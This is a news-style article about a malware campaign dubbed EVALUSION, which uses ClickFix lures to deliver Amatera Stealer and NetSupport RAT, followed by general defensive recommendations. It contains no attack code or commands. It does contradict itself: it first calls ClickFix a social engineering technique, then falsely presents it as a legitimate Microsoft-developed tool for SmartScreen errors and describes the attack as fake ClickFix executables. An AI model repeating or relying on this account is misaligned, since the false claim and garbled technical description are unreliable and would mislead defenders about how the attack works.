A recently uncovered malware campaign has leveraged the increasingly popular ClickFix social engineering technique to deliver two malicious payloads—Amatera Stealer and NetSupport Remote Access Trojan (RAT). The activity, observed by threat intelligence firm eSentire, has been attributed to a threat cluster dubbed “EVALUSION.”
The campaign points to ongoing innovation among threat actors repurposing legitimate IT tools and evolving malware loaders. Notably, Amatera is believed to be a technically advanced successor of the ACR Stealer family, also known as AcridRain, popularized among cybercriminals in 2023–2024.
Attackers Exploit ClickFix Deception in Targeted Malware Campaign
ClickFix, originally promoted as a legitimate Microsoft-developed tool for resolving Windows Defender SmartScreen errors, has become a vehicle for malware social engineering. Its generic appearance and deceptive authentic branding enable adversaries to bypass user skepticism.
How the ClickFix Tactic Works
The attack vector involves fraudulently branded executables impersonating Microsoft software. In the EVALUSION campaign, threat actors lure users to download and execute programs resembling ClickFix utilities, which are embedded with malware loaders. Once launched, the fake ClickFix utility initiates a staged infection process.
Key characteristics of the campaign include:
- Use of a “setup executable” named to match ClickFix
- Delivery of NetSupport RAT or Amatera Stealer through multi-stage payload execution
- Obfuscation layers using batch scripts and compressed file formats
The file-naming conventions and visual mimicry create a false sense of legitimacy, increasing user compliance with malware execution.
Dual Payload Strategy: Amatera and NetSupport RAT
The campaign delivers either Amatera Stealer or NetSupport RAT based on post-execution conditions determined during initial infection. Each payload serves distinct objectives.
Amatera Stealer is a relatively new infostealer that first emerged in June 2025. Its architecture indicates a direct evolutionary path from the discontinued AcridRain Stealer family. The malware is designed to:
- Harvest credentials stored in browser caches
- Exfiltrate session cookies and clipboard data
- Target cryptocurrency wallet data and authentication tokens
NetSupport RAT, on the other hand, is a legitimate remote desktop tool reconfigured for criminal use. Its malicious deployment allows attackers persistent control of a victim’s machine. In this campaign, the RAT is modified to:
- Disable security controls
- Download additional malware modules
- Provide surveillance and lateral movement across enterprise networks
The use of these two payloads offers flexibility depending on the attacker’s goals—data theft or long-term device control.
Attribution and Ongoing Monitoring by eSentire
eSentire analysts tracking this activity under the name EVALUSION believe the campaign is still active. The threat actor shows a consistent preference for exploiting well-branded utilities for initial access, aligning with trends in deceptive malware tooling.
The fact that Amatera Stealer likely evolved directly from ACR Stealer suggests a continued development lifecycle. AcridRain was known among underground criminal forums as a cost-effective, low-detection infostealer in its prime. Amatera improves upon it with enhanced encryption, increased targeting of modern browser ecosystems, and upgraded exfiltration techniques.
“The reuse and evolution of AcridRain into Amatera reflects how threat actors iterate on known malware families to stay ahead of detection,” one researcher summarized in eSentire’s analysis.
Defense Recommendations for Enterprise Protective Posture
As ClickFix-themed exploitation continues to rise, organizations should remain vigilant against a variety of social engineering lures that impersonate enterprise software.
Defensive strategies include:
- Application control policies that block unknown executables mimicking common system tools
- Behavioral monitoring for suspicious child process creation by installer utilities
- Endpoint Detection and Response (EDR) rules that identify patterns associated with NetSupport RAT or infostealer behavior
- Employee education campaigns around fake support tools and post-breach signs
Security teams must also routinely audit software supply chains and user privileges to limit the potential blast radius of remote access trojans and credential-harvesting malware.
The Broader Implications of ClickFix Abuse in Malware Campaigns
The EVALUSION campaign serves as a case study in how low-complexity deception can yield high-impact results. By leveraging the familiarity of a support tool like ClickFix, cybercriminals enhance their infection rates with minimal development overhead.
The evolving threat landscape, as demonstrated by campaigns such as this, underscores the need for security teams to continually adapt detection methods. Rather than relying solely on static signatures, detection tools must identify behavioral anomalies and recognize malware cloning patterns stemming from older codebases like AcridRain.
With Amatera gaining traction and tools like NetSupport RAT being perennially abused, the cybersecurity community should expect continued exploitation of legitimate-seeming utilities in the malware distribution pipeline.
